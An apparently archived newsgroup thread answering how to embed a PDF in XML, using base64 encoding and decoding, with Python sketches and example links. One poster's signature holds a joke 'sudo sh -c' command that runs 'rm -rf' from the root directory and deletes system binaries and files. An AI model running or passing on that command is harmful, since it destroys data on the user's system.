XML and PDF...

**Peter Flynn** · Jul 20 '05, 08:30 AM

Re: XML and PDF...

Verner Jensen, Ålborg wrote:

> Hi
>
> Is it possible to store a PDF doc, as part of an XML?

No, not directly.

> Should the PDF-part
> be encoded/wrapped or something,

Yes, that's possible. You just have to ensure that the encoder never
outputs characters that are not legal in XML, and that it never outputs
"<" or "&" unless you wrap the result in a CDATA section.
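
A minimal Python sketch of this point, assuming base64 is the chosen encoder (the variable names are illustrative only). It checks that the encoded output stays within the base64 alphabet and therefore never contains "<" or "&":

```python
import base64

# Arbitrary binary data covering every possible byte value.
raw = bytes(range(256))

encoded = base64.b64encode(raw).decode("ascii")

# The standard base64 alphabet: A-Z, a-z, 0-9, "+", "/" and "=" padding.
alphabet = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789+/="
)

# True when every output character belongs to the alphabet above.
uses_only_alphabet = set(encoded) <= alphabet

# True only if the output contained XML markup characters.
needs_escaping = any(ch in encoded for ch in "<&")
```

With an encoder like this, the output can go straight into element content and no CDATA section is needed.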

> cause I can't figure out how the XML text
> format is able to hold binary data?

It can't. XML is a text file format.

> The assignment is to extract the PDF from the XML - put it in an Oracle
> BLOB - and store it in an Ora-DB.
>
> The part which extract the PDF from XML - should this contain some kind of
> conversion (text => binary) ?

The code which extracts the encoded data would trigger a decoder which
would recreate the PDF document.
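
A rough Python sketch of that extract-then-decode step, followed by storing the result in a BLOB column. Several things here are assumptions: the encoding is taken to be base64, the element names `doc` and `pdf` and the table `documents` are invented for the example, and SQLite (from the standard library) stands in for Oracle so the sketch can run without a database server. With Oracle the same decoded bytes would be bound to a BLOB parameter through whatever driver is in use.

```python
import base64
import sqlite3
import xml.etree.ElementTree as ET

# Stand-in for real PDF bytes; a real file would be read in binary mode.
pdf_bytes = b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\nplaceholder, not a valid PDF body\n%%EOF\n"

# Hypothetical wrapper document; the element names are made up for this sketch.
xml_text = "<doc><pdf>{}</pdf></doc>".format(
    base64.b64encode(pdf_bytes).decode("ascii")
)

# Extraction step: pull the element text out, then decode text => binary.
encoded = ET.fromstring(xml_text).findtext("pdf")
decoded = base64.b64decode(encoded)

# Storage step, with an in-memory SQLite database standing in for Oracle.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE documents (id INTEGER PRIMARY KEY, body BLOB)")
conn.execute("INSERT INTO documents (body) VALUES (?)", (decoded,))
conn.commit()

# Read the BLOB back to confirm the bytes survived unchanged.
stored = conn.execute("SELECT body FROM documents").fetchone()[0]
```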

I realise it's a college assignment, but I have difficulty imagining any
circumstances in which I would want to do this. I'd be interested to know
what the person who set the assignment envisages.

///Peter, java groups removed from posting
--
sudo sh -c "cd /;/bin/rm -rf `which killall kill ps shutdown mount gdb` *
&;top"

**Patrick TJ McPhee** · Jul 20 '05, 08:30 AM

Re: XML and PDF...

In article <TQT0e.107429$Vf.4063527@news000.worldonline.dk>,
Verner Jensen, Ålborg <java@ofir.dk> wrote:

% Is it possible to store a PDF doc, as part of an XML? Should the PDF-part be
% encoded/wrapped or something, cause I can't figure out how the XML text
% format is able to hold binary data?

It's typical to use MIME base-64 encoding to encode binary data in XML
files.
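
As a rough illustration of what MIME-style base64 looks like in practice, the Python sketch below (standard library only; the sample data is made up) encodes some arbitrary bytes with line wrapping and decodes them again without stripping the line breaks first:

```python
import base64

# 1024 bytes of arbitrary binary data.
raw = bytes(range(256)) * 4

# encodebytes() emits MIME-style base64: lines of at most 76 characters,
# each terminated by a newline.
mime_text = base64.encodebytes(raw).decode("ascii")
lines = mime_text.splitlines()
longest_line = max(len(line) for line in lines)

# By default b64decode() discards characters outside the base64 alphabet,
# so the newlines do not need to be removed before decoding.
round_tripped = base64.b64decode(mime_text)
```

The line breaks are harmless inside XML element content, since the decoder ignores them.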

--

Patrick TJ McPhee
North York Canada
ptjm@interlog.com

**Romin Irani** · Jul 20 '05, 08:30 AM

Re: XML and PDF...

ptjm@interlog.com (Patrick TJ McPhee) wrote in message news:<3aj0npF67ube5U1@uni-berlin.de>...

> In article <TQT0e.107429$Vf.4063527@news000.worldonline.dk>,
> Verner Jensen, Ålborg <java@ofir.dk> wrote:
>
> % Is it possible to store a PDF doc, as part of an XML? Should the PDF-part be
> % encoded/wrapped or something, cause I can't figure out how the XML text
> % format is able to hold binary data?
>
> It's typical to use MIME base-64 encoding to encode binary data in XML
> files.

Since PDF is a binary format, you have to encode it in a text-compatible
form before inserting it into the XML instance. As correctly mentioned
above, base64 encoding is the usual choice for this.

The process would roughly be the following:

a) To encode the PDF
   1) Take the PDF content as bytes.
   2) Run it through a program or method along the lines of:
      PDFInBase64Bytes = convertToBase64(PDFBytes)
   3) Convert the result to a string and insert it into an XML instance:
      <MyXMLDoc>
        <PDFSegment>Base64 representation of PDF</PDFSegment>
      </MyXMLDoc>

b) To decode the PDF
   1) Extract the value of the XML element <PDFSegment>.
   2) Do the reverse, i.e.
      PDFBytes = decodeFromBase64(<PDFSegment> value...)
   3) Provide the PDFBytes to a PDF-aware application, e.g. Adobe PDF
      Reader.
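
The steps above can be sketched in Python roughly as follows. This is only one possible rendering: the function names `pdf_to_xml` and `xml_to_pdf` are invented for the example, the standard library's `base64` and `xml.etree.ElementTree` modules stand in for the convertToBase64 / decodeFromBase64 placeholders, and the sample bytes are a stand-in rather than a real PDF.

```python
import base64
import xml.etree.ElementTree as ET


def pdf_to_xml(pdf_bytes: bytes) -> str:
    """Wrap PDF bytes in <MyXMLDoc><PDFSegment>...</PDFSegment></MyXMLDoc>."""
    root = ET.Element("MyXMLDoc")
    segment = ET.SubElement(root, "PDFSegment")
    # Steps a.1 to a.3: bytes -> base64 bytes -> string -> element content.
    segment.text = base64.b64encode(pdf_bytes).decode("ascii")
    return ET.tostring(root, encoding="unicode")


def xml_to_pdf(xml_text: str) -> bytes:
    """Recover the original PDF bytes from XML shaped like the above."""
    root = ET.fromstring(xml_text)
    # Step b.1: extract the value of the <PDFSegment> element.
    encoded = root.findtext("PDFSegment")
    if encoded is None:
        raise ValueError("no <PDFSegment> element found")
    # Step b.2: base64 string -> original bytes.
    return base64.b64decode(encoded)


# Stand-in bytes; a real PDF would be read with open(path, "rb").read().
sample_pdf = b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\nplaceholder body\n%%EOF\n"

xml_doc = pdf_to_xml(sample_pdf)
restored = xml_to_pdf(xml_doc)
```

For step b.3, writing `restored` to a file opened in binary mode ("wb") gives something a PDF viewer can open, provided the input was a real PDF.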

There are several free base64 encoding/decoding libraries available on
the net in a variety of languages. Pick one and try it out.

We have used the process described above and it works fine.

**Verner Jensen, Ålborg** · Jul 20 '05, 08:31 AM

Re: XML and PDF...

Thx a lot - fine description ;-)

Rgds, Henrik

**dc** · Jul 20 '05, 08:31 AM

Re: XML and PDF...

here's an example of an XML doc that contains a PNG image, base64-encoded.

http://dinoch.dyndns.org:7070/WordML/source/WordML/10555.xml

here's the JSP that generates it:

http://dinoch.dyndns.org:7070/WordML/srcview.jsp?dir=WordML&file=GetOrderConfXsl.jsp

you can actually run the JSP, load the resulting XML into MS Word, and
see the image rendered.

http://dinoch.dyndns.org:7070/WordML/GetOrderConfXsl.jsp

(need MS-Word installed to do this)

-D
